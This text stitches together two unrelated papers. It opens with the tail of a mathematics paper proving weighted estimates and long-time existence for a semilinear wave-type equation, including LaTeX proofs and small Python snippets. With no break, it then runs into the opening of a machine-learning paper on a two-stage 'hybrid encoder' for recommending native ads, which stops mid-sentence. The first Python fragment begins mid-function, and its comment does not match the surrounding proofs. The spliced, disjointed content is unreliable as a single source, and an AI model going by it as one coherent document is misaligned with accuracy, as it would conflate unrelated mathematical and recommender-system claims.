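        if f(mid) > 0:
            lo = mid
        else:
            hi = mid
    return lo

# With a = 1 and h = 2 the prediction is S ~ |ln eps|; the ratio below
# approaches 1 slowly (a log-log correction) as eps shrinks.
ratios = [solve_S(e) / abs(math.log(e)) for e in (1e-3, 1e-6, 1e-12)]
```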
\section{Long-time existence for $A\in[3,\infty)$}\label{Se:4}
In this section, we will consider the case $A\in[3,\infty)$, and show the proof of \Th{Th:M_2}. Again, we only need to consider the equation \eqref{Eq:u_o}.
\subsection{Estimate for linear solution}
In this subsection, we will construct some prior estimates of the solution to the linear equation \eqref{Eq:u_l}. Firstly we give the following argument.
\begin{lemma}\label{Le:ul_e1}
Let $u$ be the solution of \eqref{Eq:u_l}. We have
\begin{Eq}\label{Eq:ul_e11}
\kl\|r^{\frac{A-1}{2}}u\kr\|_{L_t^\infty L_r^q}\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^q}+ \|r^{\frac{A-1}{2}}f\|_{L_r^q}+\|r^{\frac{A+1}{2}}F\|_{L_t^qL_r^1},
\end{Eq}
for any $1<q<\infty$, and
\begin{Eq}\label{Eq:ul_e12}
\kl\|r^{\frac{A-1}{2}-\alpha}u\kr\|_{L_t^\sigma L_r^p}\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^q}+ \|r^{\frac{A-1}{2}}f\|_{L_r^q}+\|r^{\frac{A+1}{2}}F\|_{L_t^qL_r^1},
\end{Eq}
provided that
\begin{Eq}\label{Eq:sigpq_r}
1<\frac{q}{p}<\frac{\sigma}{p}<\infty,\qquad~\alpha p=1-\frac{p}{q}+\frac{p}{\sigma}.
\end{Eq}
\end{lemma}
We also have the following variant.
\begin{lemma}\label{Le:ul_e2}
Let $u$ be the solution of \eqref{Eq:u_l}. If $1<p\leq (n+1)/(n-1)$, then
\begin{Eq}\label{Eq:ul_e21}
&(T+1)^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p(r<T+1)}\\
\lesssim& \|r^{\frac{A+1}{2}}g\|_{L_r^p}+ \|r^{\frac{A-1}{2}}f\|_{L_r^p}+\|r^{\frac{A+1}{2}}F\|_{L_t^pL_r^1(t<T)}.
\end{Eq}
Also,
if $(n+1)/(n-1)\leq p\leq p_S$,
then
\begin{Eq}\label{Eq:ul_e22}
&T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p}\\
\lesssim& \|r^{\frac{A+1}{2}+\frac{1}{p}}g\|_{L_r^\infty}+ \|r^{\frac{A-1}{2}+\frac{1}{p}}f\|_{L_r^\infty}+T^{\frac{1}{p}}\|r^{\frac{A+1}{2}}F\|_{L_t^\infty L_r^1(T/4<t<T)}\\
&+\|r^{\frac{A+1}{2}}g\|_{L_r^p}+ \|r^{\frac{A-1}{2}}f\|_{L_r^p}+\|r^{\frac{A+1}{2}}F\|_{L_t^pL_r^1(t<T/4)}.
\end{Eq}
\end{lemma}
\begin{proof}[Proof of \Le{Le:ul_e1}]
When $A\in {\mathbb{Z}}_+$,
this result is exactly the same as Theorem 4.7 of \cite{MR1408499},
since we can take $\kappa$ in Theorem 4.7 arbitrarily close to $2$.
So we only deal with the non-integer case.
Here we introduce $\delta< (A-3)/2$ which will be fixed later.
Firstly we consider $u=u_g$.
Using \Le{Le:u_e} and \Le{Le:I_p} with $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$,
we have
\begin{Eq*}
r^{\frac{A-1}{2}}|u_g|\lesssim&
\int_{|t-r|}^{t+r}(1+\mu)^{-\delta}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho+\int\limits_{0<\rho<t-r\atop -2<\mu<-1}|1+\mu|^{-\delta}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho\\
&+\int\limits_{0<\rho<t-r\atop \mu<-2}(1-\mu)^{\frac{1-A}{2}}\rho^{\frac{A-1}{2}}|g(\rho)|\d\rho\\
\lesssim&\int_{|t-r|}^{t+r}(1+\mu)^{-\delta}\rho^{-1}|\rho^{\frac{A+1}{2}}g(\rho)|\d\rho\\
&+\int\limits_{0<\rho<t-r}(1-\mu)^{-1}|1+\mu|^{-\delta}\rho^{-1}|\rho^{\frac{A+1}{2}}g(\rho)|\d\rho,
\end{Eq*}
where the second integral does not appear for $t<r$.
Using Proposition 2.7 and Proposition 4.4 in \cite{MR1408499}, we obtain the desired estimate.
Next we consider $u=u_f$. Here for simplicity we denote $h(\rho):=\rho^{\frac{A-1}{2}}f(\rho)$.
Using \Le{Le:u_e} and \Le{Le:I_p} again with $\mu=\frac{r^2+\rho^2-t^2}{2r\rho}$,
for $r<t$ we find
\begin{Eq*}
r^{\frac{A-1}{2}}u_f=&\frac{1}{2}h(t+r)-P.V.\int_0^{t+r}\frac{t}{r\rho}I_A'(\mu)h(\rho)\d\rho,\\
r^{\frac{A-1}{2}}|u_f|\lesssim& \frac{1}{2}|h(t+r)|+\kl|P.V.\int\limits_{0\leq\rho\leq t+r\atop -2<\mu<1}\frac{t}{r\rho}(1+\mu)^{-1}h(\rho)\d\rho\kr|\\
&+\int\limits_{0\leq\rho\leq t+r\atop -2<\mu<1}\frac{t}{r\rho}|1+\mu|^{-\delta}|h(\rho)|\d\rho+\int\limits_{0\leq\rho\leq t-r\atop \mu<-2}\frac{t}{r\rho}|1-\mu|^{\frac{-1-A}{2}}|h(\rho)|\d\rho\\
\lesssim&\frac{1}{2}|h(t+r)|+\kl|P.V.\int_{0}^{t+r}\frac{t}{r\rho}(1+\mu)^{-1}h(\rho)\d\rho\kr|\\
&+\int_{0}^{t-r}\frac{t}{r\rho}|1-\mu|^{-1}|h(\rho)|\d\rho+\int_{t-r}^{t+r}\frac{t}{r\rho}|1+\mu|^{-\delta}|h(\rho)|\d\rho\\
&+\int_0^{t-r}\frac{t}{r\rho}(1-\mu)^{-1}|1+\mu|^{-\delta}|h(\rho)|\d\rho\\
\equiv& K_1+K_2+K_3+K_4+K_5.
\end{Eq*}
It is easy to see that
\begin{Eq*}
\|K_1\|_{L_t^\infty L_r^q}\lesssim \|h\|_{L_r^q}.
\end{Eq*}
On the other hand, we recall the well-known \emph{Hardy-Littlewood} inequality
\begin{Eq*}
\kl\||y|^{-\alpha}f(x\pm y)\kr\|_{L_x^\sigma L_y^p({\mathbb{R}}^2)} \lesssim \|f\|_{L^q({\mathbb{R}})},
\end{Eq*}
with \eqref{Eq:sigpq_r}. Now, taking $f(x)=|h(x)|\chi_{[0,\infty)}(x)$, we also find
\begin{Eq*}
\|r^{-\alpha}K_1\|_{L_t^\sigma L_r^p}\lesssim \|h\|_{L_r^q},
\end{Eq*}
provided that \eqref{Eq:sigpq_r} holds.
Meanwhile, adopting Proposition 2.5 in \cite{MR1408499} to deal with $K_4$, and Proposition 4.4 in \cite{MR1408499} for $K_3$ and $K_5$, we find that all of them admit the same bounds as $K_1$.
As for $K_2$, noticing
\begin{Eq*}
\frac{t}{r\rho}(1+\mu)^{-1}=\frac{1}{r+\rho-t}-\frac{1}{t+r+\rho},
\end{Eq*}
we can control $K_2$ by
\begin{Eq*}
K_2\lesssim &\kl|P.V.\int_0^\infty \frac{1}{\rho+r-t}h(\rho)\d\rho\kr|+\int_{t+r}^\infty \frac{1}{\rho+r-t}|h(\rho)|\d\rho\\
&+\frac{1}{t+r}\int_0^{t+r}|h(\rho)|\d\rho\\
\equiv&K_{2,1}(t-r)+K_{2,2}(t,r)+K_{2,3}(t+r).
\end{Eq*}
For $K_{2,1}$, we introduce the estimate of \emph{Hilbert}-transform
\begin{Eq*}
\kl\|P.V.\int \frac{1}{x-y}f(y)\d y\kr\|_{L_x^q}\lesssim \|f\|_{L_x^q}
\end{Eq*}
with $1<q<\infty$. Taking $f(x)=h(x)\chi_{[0,\infty)}(x)$, we find
\begin{Eq*}
\kl\|K_{2,1}(t-r)\kr\|_{L_t^\infty L_r^q}=\kl\|K_{2,1}(r)\kr\|_{L_r^q}\lesssim \|h\|_{L^q}.
\end{Eq*}
Also, using the \emph{Hardy-Littlewood} inequality again, we obtain the same bound for $K_{2,1}(t-r)$ as for $K_1$, provided that \eqref{Eq:sigpq_r} holds. As for $K_{2,3}$, we introduce the \emph{Hardy-Littlewood} maximal inequality
\begin{Eq*}
\kl\|\sup_{y>0}\frac{1}{2y}\int_{x-y}^{x+y} f(z)\d z\kr\|_{L_x^q}\lesssim \|f\|_{L^q}
\end{Eq*}
with $1<q<\infty$. Taking $f(x)=h(x)\chi_{[0,\infty)}(x)$, we find
\begin{Eq*}
\kl\|K_{2,3}(t+r)\kr\|_{L_t^\infty L_r^q}=\kl\|K_{2,3}(r)\kr\|_{L_r^q}\lesssim \|h\|_{L^q}.
\end{Eq*}
Using the \emph{Hardy-Littlewood} inequality again, we obtain the same bound for $K_{2,3}(t+r)$ as for $K_1$, provided that \eqref{Eq:sigpq_r} holds.
Finally, for $K_{2,2}(t,r)$, we have
\begin{Eq*}
K_{2,2}(t,r)=\int_r^\infty \frac{1}{\rho+r}|h(\rho+t)|\d\rho\leq \int_r^\infty \rho^{-1}|h(\rho+t)|\d\rho.
\end{Eq*}
Then, using \emph{Hardy's} inequality we find
\begin{Eq*}
\|K_{2,2}\|_{L_t^\infty L_r^q}\lesssim \|h\|_{L_r^q}.
\end{Eq*}
On the other hand, for any $G(t,r)$ with $\|G\|_{L_t^{\sigma'}L_r^{p'}}\leq 1$ we see
\begin{Eq*}
&\int_0^\infty\int_0^\infty r^{-\alpha}K_{2,2}(t,r)G(t,r)\d r\d t\\
=&\int_0^\infty\int_t^\infty \int_{0}^{\rho-t} \frac{r^{-\alpha}}{\rho+r-t}|h(\rho)|G(t,r)\d r\d\rho\d t\\
\lesssim &\int_0^\infty\int_t^\infty |h(\rho)|\kl\|\frac{r^{-\alpha}}{\rho+r-t} \kr\|_{L_r^p(0,\rho-t)}\|G\|_{L_r^{p'}}\d\rho\d t\\
\approx &\int_0^\infty\int_t^\infty |h(\rho)||\rho-t|^{-\alpha-1+\frac{1}{p}}\|G\|_{L_r^{p'}}\d\rho\d t\\
\lesssim &\kl\|\int_t^\infty |h(\rho)||\rho-t|^{-\alpha-1+\frac{1}{p}}\d\rho\kr\|_{L_t^{\sigma}}\\
\lesssim &\|h\|_{L_r^q},
\end{Eq*}
where in the last step we use the \emph{Hardy-Littlewood} inequality. Now, we find
\begin{Eq*}
\|r^{-\alpha}K_{2,2}\|_{L_t^\sigma L_r^p}\leq\sup\limits_{\|G\|_{L_t^{\sigma'}L_r^{p'}}\leq 1}\kl<r^{-\alpha}K_{2,2},G\kr>\lesssim \|h\|_{L_r^q}.
\end{Eq*}
Combining these results, we obtain the estimate for the $r<t$ part. For $r>t$, we have
\begin{Eq*}
r^{\frac{A-1}{2}}u_f=&\frac{1}{2}h(t+r)+\frac{1}{2}h(r-t)-\int_{r-t}^{t+r}\frac{t}{r\rho}I_A'(\mu)h(\rho)\d\rho\\
\equiv &K_1'+K_2'+K_3'.
\end{Eq*}
The estimates of $K_1'$ and $K_2'$ are the same as that of $K_1$ in the $r<t$ part, and the estimate of $K_3'$ is the same as that of $K_4$. Putting everything together, we finish the proof of the $u_f$ part.
Finally, we consider $u=u_F$.
Using \Le{Le:u_e} and \Le{Le:I_p} again with $\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho}$,
similarly we have
\begin{Eq*}
r^{\frac{A-1}{2}}u_F=&\int_0^t\int_{0}^{r+t-s}I_A(\mu)\rho^{\frac{A-1}{2}}F(s,\rho)\d\rho\d s\\
r^{\frac{A-1}{2}}|u_F|\lesssim&\int_0^t\int_{|r-t+s|}^{r+t-s}(1+\mu)^{-\delta}\rho^{-1}|G(s,\rho)|\d\rho\d s
\\
&+\iint\limits_{0\leq s\leq t\atop 0\leq \rho\leq t-s-r}(1-\mu)^{-1}|1+\mu|^{-\delta}\rho^{-1}|G(s,\rho)|\d\rho\d s
\end{Eq*}
where $G(s,\rho):=\rho^{\frac{A+1}{2}}F(s,\rho)$ and the second integral does not appear for $t-s<r$. Here we choose $\delta$ small enough. Using Proposition 4.5 in \cite{MR1408499}, we obtain the desired estimate for $u_F$.
Now, we finish the proof of \Le{Le:ul_e1}.
\end{proof}
\begin{proof}[Proof of \Le{Le:ul_e2}]
The proof of \Le{Le:ul_e2} is almost the same as that of Theorem 6.4 in \cite{MR1408499}. Thus, we only give a sketch of the proof.
The estimate \eqref{Eq:ul_e21} and part of the estimate \eqref{Eq:ul_e22} are direct consequences of \eqref{Eq:ul_e11} with $q=p$.
We only need to show the estimate of
$T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u(T,r)\kr\|_{L_r^p(r<T/4)}$.
To bound $u_f$, we split $f=f_0+f_1$ with $f_0=\chi_{[0,T/4]}f$.
Then, $u_{f=f_1}$ depends only on $f_1(\rho)$ with $T/4<\rho<5T/4$.
So, we obtain the weight in $T$ by extracting the weight in $\rho$.
For $u_{f=f_0}$, we find that $\rho,r<T/4$ in the expression of $u_{f=f_0}$
where $|1\pm\mu|^{-1}\approx r\rho/T^2$.
Then we get the desired estimate by a direct calculation.
The estimate of $u_g$ is similar to that of $u_f$. Finally for $u_F$, we separate the integral in $u_F$ into three parts: $\{r\geq(T-s)/4\}$, $\{r,\rho\leq(T-s)/4\}$ and $\{r\leq (T-s)/4\leq \rho\}$. Then we get the estimate by a similar discussion.
\end{proof}
\subsection{Long-time existence for $1<p<p_{conf}$}
In this subsection, we will give the proof of \Th{Th:M_2}.
The main line of the proof is almost the same as that of \cite[Theorem 5.1, Theorem 6.1 and Theorem 6.3]{MR1408499}.
So we only prove global existence for $p_S<p<p_{conf}$ and long-time existence for $p_m\leq p<p_S$, to show that these arguments fit our framework.
\setcounter{part0}{0}
\value{parta}[Proof of $p_S< p<p_{conf}$]
Similar to the last section,
we will construct a Cauchy sequence to approach the weak solution.
We set $u_{-1}=0$ and let $u_{j+1}$ be the solution of the equation \eqref{Eq:uj_o}.
We are going to use the estimate \eqref{Eq:ul_e12},
where we set
\begin{Eq*}
q=\frac{2(p-1)}{(n+3)-(n-1)p},\qquad \sigma=pq,\qquad \alpha=\frac{(n-1)p-n-1}{2p}.
\end{Eq*}
Here $p<p_{conf}$ gives $0<q<\infty$, and $p>p_S$ gives $q>p$. Then, we conclude
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j+1}\kr\|_{L_t^{pq} L_r^p}\leq& \varepsilon C_0\Psi+C_0\|r^{\frac{(A-n)p+n+1}{2}}|u_{j}|^p\|_{L_t^qL_r^1}\\
\leq& \varepsilon C_0\Psi+C_0\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}\|_{L_t^{pq}L_r^p}^p\\
\Psi:=&\kl\|r^\frac{n+1}{2}U_1\kr\|_{L_r^q}+\|r^{\frac{n-1}{2}}U_0\|_{L_r^q}
\end{Eq*}
for some $C_0$ large enough.
Then, for any $\varepsilon$ satisfying $(2\varepsilon C_0\Psi)^p<\varepsilon \Psi$, we find that
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}\kr\|_{L_t^{pq} L_r^p}\leq 2\varepsilon C_0\Psi
\end{Eq*}
holds for any $j\geq 0$. By this result and \eqref{Eq:ul_e12} we also find
\begin{Eq*}
&\kl\|r^{\frac{(A-n)p+n+1}{2p}}\kl(u_{j+1}-u_j\kr)\kr\|_{L_t^{pq} L_r^p}\\
\leq& C_0\|r^{\frac{(A-n)p+n+1}{2}}\kl(|u_{j}|^p-|u_{j-1}|^p\kr)\|_{L_t^qL_r^1}\\
\leq& C_1\|r^{\frac{(A-n)p+n+1}{2p}}(u_{j}-u_{j-1})\|_{L_t^{pq}L_r^p}\max_{k\in\{j,j-1\}}\|r^{\frac{(A-n)p+n+1}{2p}}u_k\|_{L_t^{pq}L_r^p}^{p-1}\\
\leq& C_1(2\varepsilon C_0\Psi)^{p-1}\|r^{\frac{(A-n)p+n+1}{2p}}(u_{j}-u_{j-1})\|_{L_t^{pq}L_r^p}
\end{Eq*}
with some $C_1$ large enough.
Now, for any $\varepsilon>0$ with $C_1(2\varepsilon C_0\Psi)^{p-1}<1/2$,
we find that $\{u_j\}$ is a Cauchy sequence in this space.
Denote the limit by $u$.
Using \eqref{Eq:ul_e11} we can also find
$\|r^{\frac{A-1}{2}}u\|_{L_t^\infty L_r^q}\leq 2\varepsilon C_2\Psi$ with some $C_2$.
To check that it is indeed the weak solution of \eqref{Eq:u_o},
we need to show \eqref{Eq:u_i_r}.
For any compact set $K_t\times K_r\subset {\mathbb{R}}_+^2$, we find
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+A}{2}-1}|u|^p\kr\|_{L_{t,r}^1(K_t\times K_r)}\leq& C(K_t)\kl\|r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^{pq} L_r^p}^p\kl\|r^{\frac{A-3}{2}}\kr\|_{L_r^{\infty}(K_r)}\\
\leq& (2\varepsilon C_0\Psi)^pC(K_t,K_r)<\infty\\
\|r^{A-1}u\|_{L_{t,r}^1(K_t\times K_r)}\leq &C(K_t)\kl\|r^{\frac{A-1}{2}}u\kr\|_{L_t^\infty L_r^q}\kl\|r^{\frac{A-1}{2}}\kr\|_{L_r^{q'}(K_r)}\\
\leq& (2\varepsilon C_1\Psi)C(K_t,K_r)<\infty.
\end{Eq*}
This finishes the proof.
\value{parta}[Proof of $p_m\leq p<p_S$]
Next we consider $(n+1)/(n-1)\leq p< p_S$. Set
\begin{Eq*}
A_j(T):=T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}u_{j}(T,r)\kr\|_{L_r^p},
\end{Eq*}
using \eqref{Eq:ul_e22} we see
\begin{Eq*}
A_{j+1}(T)\leq& \varepsilon C_0\Psi+ C_0T^{\frac{1}{p}}\|r^{\frac{(A-n)p+n+1}{2}}|u_j|^p\|_{L_t^\infty L_r^1(T/4<t<T)}
\\
&+C_0\|r^{\frac{(A-n)p+n+1}{2}}|u_j|^p\|_{L_t^pL_r^1(t<T/4)}\\
\leq& \varepsilon C_0\Psi+ C_0T^{\frac{1}{p}}\|t^{\frac{(1-n)p+n+1}{2p}}A_j(t)\|_{L_t^\infty(T/4<t<T)}^p
\\
&+C_0\|t^{\frac{(1-n)p+n+1}{2p}}A_j(t)\|_{L_t^{p^2}(t<T/4)}^p
\end{Eq*}
for some $C_0$ large enough and
\begin{Eq*}
\Psi:=\|r^{\frac{n+1}{2}+\frac{1}{p}}U_1\|_{L_r^\infty}+ \|r^{\frac{n-1}{2}+\frac{1}{p}}U_0\|_{L_r^\infty}
&+\|r^{\frac{n+1}{2}}U_1\|_{L_r^p}+ \|r^{\frac{n-1}{2}}U_0\|_{L_r^p}.
\end{Eq*}
When $\sup_{0\leq T\leq T_*}A_j(T)\leq 2\varepsilon C_0\Psi$ holds for some $j$ and $T_*$ defined in \eqref{Eq:Main_6} with $c$ to be fixed later, we find
\begin{Eq*}
\sup_{0\leq T\leq T_*} A_{j+1}(T)\leq&\varepsilon C_0\Psi+ C_1(2\varepsilon C_0 \Psi)^pT_*^{\frac{(1-n)p^2+(n+1)p+2}{2p}}\\
\leq&\varepsilon C_0\Psi+ \varepsilon C_1(2 C_0 \Psi)^p c^{\frac{-h_S}{2p}}
\end{Eq*}
with some $C_1$. Choosing $c$ small enough such that $C_1(2 C_0 \Psi)^p c^{\frac{-h_S}{2p}}\leq C_0\Psi$ and noticing $A_{-1}(T)\equiv 0$, we find that this estimate holds for any $j$. A similar argument also shows
\begin{Eq*}
\sup_{0\leq T\leq T_*} B_{j+1}(T)\leq& \frac{1}{2}\sup_{0\leq T\leq T_*} B_{j}(T),\\
B_{j}(T):=&T^{\frac{(n-1)p-n-1}{2p}}\kl\|r^{\frac{(A-n)p+n+1}{2p}}\kl(u_{j}-u_{j-1}\kr)(T,r)\kr\|_{L_r^p}.
\end{Eq*}
Then, we get the desired solution $u$ as the limit of $\{u_j\}$.
Now we check \eqref{Eq:u_i_r}. For any compact set $K_t\times K_r\subset {\mathbb{R}}_+^2$, we find
\begin{Eq*}
\kl\|r^{\frac{(A-n)p+n+A}{2}-1}|u|^p\kr\|_{L_{t,r}^1(K_t\times K_r)}\leq& \kl\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^\infty L_r^p}^p\\
&\times \kl\|t^{\frac{(1-n)p+n+1}{2}}r^{\frac{A-3}{2}}\kr\|_{L_t^1 L_r^\infty(K_t\times K_r)},\\
\|r^{A-1}u\|_{L_{t,r}^1(K_t\times K_r)}\leq &\kl\|t^{\frac{(n-1)p-n-1}{2p}}r^{\frac{(A-n)p+n+1}{2p}}u\kr\|_{L_t^\infty L_r^p}\\
&\times\kl\|t^{\frac{(1-n)p+n+1}{2p}}r^{\frac{(n+A-2)p-n-1}{2p}}\kr\|_{L_t^1 L_r^{p'}(K_t\times K_r)}.
\end{Eq*}
Noticing $\frac{(n+A-2)p-n-1}{2p}>\frac{A-3}{2p}\geq 0$ and $\frac{(1-n)p+n+1}{2}>-1$ due to $p<p_S<p_{conf}$, we find that both of the above terms are finite.
This finishes the proof.
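The two exponent inequalities invoked above reduce to $p>1$ (using $n+A-2>0$, which holds since $A\geq 3$) and $p<p_{conf}=(n+3)/(n-1)$, respectively. The following numeric spot-check, over an illustrative grid of parameters (the grid itself is an arbitrary choice for demonstration), confirms them:

```python
# Spot-check of the two exponent inequalities used in the proof above.
def check(n, A, p):
    lhs1 = ((n + A - 2) * p - n - 1) / (2 * p)
    rhs1 = (A - 3) / (2 * p)
    lhs2 = ((1 - n) * p + n + 1) / 2
    return lhs1 > rhs1 >= 0 and lhs2 > -1

# A >= 3 and 1 < p < p_conf = (n+3)/(n-1), as in this section's setting.
ok = all(
    check(n, A, p)
    for n in (2, 3, 4)
    for A in (3.0, 3.5, 5.0)
    for p in (1.01, 1.5, (n + 3) / (n - 1) - 0.01)
)
```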
\subsection*{Acknowledgments}
The authors would like to thank the anonymous referee for the careful reading and valuable comments.
The authors were supported by NSFC 11671353 and NSFC 11971428.
Native ads are important ways of online advertising, where advertisements are
imperceptibly injected into the webpages being browsed by the users. In contrast to the conventional search ads where queries are explicitly specified by user, native ads are recommended implicitly based on user's web-browsing history. Apparently, high-quality recommendation calls for deep understanding of user behavior and ad content. In recent years, transformer-based models turn out to be popular solutions due to their superior capability on natural language processing, e.g., Bert \cite{devlin2018bert} and RoBerta \cite{liu2019roberta}. The existing methods would represent a pair of input sequences independently with a siamese encoder \cite{reimers2019sentence,lu2020twinbert} (as the two-tower architecture in Figure \ref{fig:baseline}.A), and measure their relevance based on the embeddings' similarity, such as cosine and inner-product. With these approaches, relevant ads can be efficiently acquired via ANN search, like PQ \cite{jegou2010product, ge2013optimized} and HNWS \cite{malkov2018efficient}. However, one obvious defect is that there is no interaction between the user and ad encoding process. Given that the underlying semantic about user and ad can be complicated, such independently generated embeddings is prone to information loss, thus cannot reflect the user-ad relationship precisely. In contrast, another form of transformer encoding networks, the cross-encoder (as the one-tower structure in Figure \ref{fig:baseline}.B), can be much more accurate \cite{luan2020sparse,lee2019latent}, where the input sequences may fully attend to each other during the encoding process. Unfortunately, the cross-encoder is highly time-consuming and hardly feasible
for realtime services like native ads recommendation, as every pair of user and ad needs to be encoded and compared from scratch. These challenges raise a fundamental question: can an encoding architecture be both efficient and precise? Motivated by this challenge, we propose the hybrid encoder, which addresses the above problem with the following designs.
$\bullet$ \textbf{Two-stage workflow}. Instead of making recommendations in one shot, the hybrid encoder selects appropriate ads through two consecutive steps, retrieval and ranking, with two sets of user and ad representations. First, it represents user and ad independently with a siamese encoder, such that relevant candidates can be retrieved via ANN search. Second, it generates disentangled ad embeddings and ad-related user embeddings, based on which high-quality ads can be identified from the candidate set. Both steps are highly efficient, which makes the time cost affordable in practice.
$\bullet$ \textbf{Fast ranking}. Unlike the conventional time-consuming cross-encoder, the hybrid encoder establishes the user-ad interaction by intensively re-using cached hidden-states and pre-computation results. On the one hand, it caches the transformer's last-layer hidden-states for the user, which comprehensively preserve the information about the user's web-browsing behaviors. On the other hand, it pre-computes the disentangled embeddings for each ad. When an ad is chosen as a user's candidate, the disentangled ad embeddings attend to the user's cached hidden-states, which gives rise to the ``ad-related'' user embeddings. With such embeddings, the necessary information for analyzing the user-ad relationship can be effectively extracted, which in turn contributes to the selection of the best ads from the candidate set. Apparently, most of the involved operations are light-weight, e.g., inner-product and summation, whose time cost is almost negligible compared with the feed-forward inference of the transformer. Therefore, the running time of the ranking step is approximately upper-bounded by one pass of transformer encoding.
$\bullet$ \textbf{Progressive training pipeline}. Although both the retrieval and ranking steps aim to find appropriate advertisements w.r.t. the presented user, they are deployed for distinct purposes, and thus need to be learned in different ways. In this work, a progressive learning strategy is adopted to optimize the overall performance of the two-stage workflow. For one thing, the retrieval step selects coarse-grained candidates from the whole advertisement corpus; therefore, it is trained with \textit{global contrast learning}, which discriminates the ground-truth from negatives sampled from the global scope. For another, the ranking step selects the best advertisements from the candidate set generated by a certain retrieval policy. Therefore, the model is further trained with \textit{local contrast learning}, where a set of candidate advertisements is sampled based on the retrieval policy learned in the first stage, and the model is required to identify the ground-truth given such ``hard negative samples''.
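The two training stages described above can be illustrated with a single loss form, softmax cross-entropy over one positive ad and sampled negatives, differing only in where the negatives come from. The NumPy sketch below is a hedged simplification; the exact objective and sampling procedure of the production system are not specified here.

```python
import numpy as np

def contrastive_loss(user_emb, pos_ad, neg_ads):
    """Softmax cross-entropy over one positive ad and sampled negatives.
    For global contrast learning, neg_ads would be drawn uniformly from
    the corpus; for local contrast learning, they would be the top
    candidates returned by the already-trained retrieval model."""
    ads = np.vstack([pos_ad[None, :], neg_ads])   # (1 + m, d), positive first
    logits = ads @ user_emb                       # inner-product scores
    logits -= logits.max()                        # numerical stability
    return float(-logits[0] + np.log(np.exp(logits).sum()))
```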
Comprehensive empirical investigations are performed on the Microsoft Audience Ads\footnote{https://about.ads.microsoft.com/en-us/solutions/microsoft-audience-network/microsoft-audience-ads} platform, where the hybrid encoder's effectiveness is verified from the following aspects. \textbf{I.} It achieves recommendation quality comparable to the accurate but expensive cross-encoder, given a sufficiently large running-time budget. \textbf{II.} It significantly outperforms the conventional siamese encoder when the time cost is limited within the tolerable range required by production. Additional studies are also made with a publicly available dataset, which further confirms the above findings.
To sum up, the following contributions are made in this work.
\\
$\bullet$ We propose the hybrid encoder, which recommends native ads with a two-stage workflow: the retrieval step collects coarse-grained candidates from the whole corpus, and the ranking step selects the best ads from the given candidates. Both steps are highly efficient, and they collaboratively produce precise recommendations for the user.
\\
$\bullet$ The proposed model is trained progressively through global contrast learning and local contrast learning, which optimizes the overall performance of the two-stage recommendation workflow.
\\
$\bullet$ The effectiveness of hybrid encoder is verified with large-scale data from native ads production. Compared with conventional transformer encoders, hybrid encoder is competitive in terms of both recommendation precision and working efficiency.
\begin{figure}[t]
\centering
\includegraphics[width=0.92\linewidth]{Figures/one_two.pdf}
\caption{Illustration of conventional transformer encoders. (A) Siamese encoder: the user's browsed web-pages and the ad's description are encoded independently, and their relevance is calculated as the embedding similarity. (B) Cross encoder: the user's browsed web-pages and the ad's description are concatenated into one token list and jointly encoded by a unified transformer; the relevance is computed based on the final hidden-states, usually the one corresponding to the [CLS] token.}
\label{fig:baseline}
\end{figure}
\section{Related Work}
In this section, related works are discussed from the following perspectives: 1) native ads recommendation, and 2) transformer encoding networks.
\subsection{Native Ads Recommendation}
Native ads are a relatively new form of online advertising, where advertisements are recommended to users based on their web-browsing behaviors. A typical recommendation workflow is composed of the following operations. Particularly, each advertisement is characterized by a compact description, e.g., new apple ipad mini. When an advertising request is presented, the system turns the user's browsed web-pages into ``implicit queries'' and finds the most relevant ad descriptions. Finally, the selected ads are displayed imperceptibly on the web-pages being browsed by the user. In the early days, the recommendation process would intensively make use of retrieval algorithms built on explicit features: each ad description is further split into a set of keywords, based on which an inverted index can be built to organize the whole set of advertisements. To make the index more accurate and compact, conventional IR techniques like TF-IDF and BM25 are adopted so as to identify the most important keywords for the index \cite{robertson2009probabilistic, manning2008introduction}. Given an implicit query from the user, the system extracts its keywords in the first place, and then joins them with the inverted index so as to collect the advertisements within the matched entries.
Apparently, the old-fashioned approaches can be severely limited by the degree of keyword overlap. To overcome such a defect, more and more effort has been made on latent retrieval \cite{fan2019mobius,huang2020embedding}, where the semantic relationship between user and ad can be measured more precisely with compact embeddings. Early representative works along this direction include DSSM \& CDSSM \cite{huang2013learning,shen2014latent}, where multi-layer perceptrons and convolutional neural networks are adopted; in recent years, much more advanced approaches have been continuously developed, especially based on transformer encoders and pretrained language models, such as \cite{reimers2019sentence,lu2020twinbert,karpukhin2020dense,guu2020realm,lee2019latent}.
\subsection{Transformer Encoding Networks}
Transformer is a powerful network structure for text encoding \cite{vaswani2017attention}, as long-range interactions can be established within the input sequence on top of multi-head self-attention. In recent years, multi-layer transformer encoders have become the foundation of almost every large-scale pretrained language model, like BERT \cite{devlin2018bert} and RoBerta \cite{liu2019roberta}, with which the underlying semantics of the presented text can be captured in depth. Given its superior capability in various NLP applications, transformer is also used as the backbone network structure for text retrieval \cite{reimers2019sentence,lu2020twinbert,karpukhin2020dense}. Typically, a two-tower transformer encoding network (also known as a \textit{siamese encoder} or \textit{bi-encoder}) is deployed, which generates the latent representations for the source and target text segments; after that, the source-target relevance can be measured by embedding similarity, e.g., cosine or inner-product. The siamese encoder naturally fits the need of large-scale retrieval/recommendation, as relevant targets can be efficiently acquired for the given source via well-known ANN paradigms, e.g., PQ \cite{jegou2010product,ge2013optimized} and HNSW \cite{malkov2018efficient}. However, one obvious limitation of the siamese encoder is that the source and target are encoded independently; in other words, 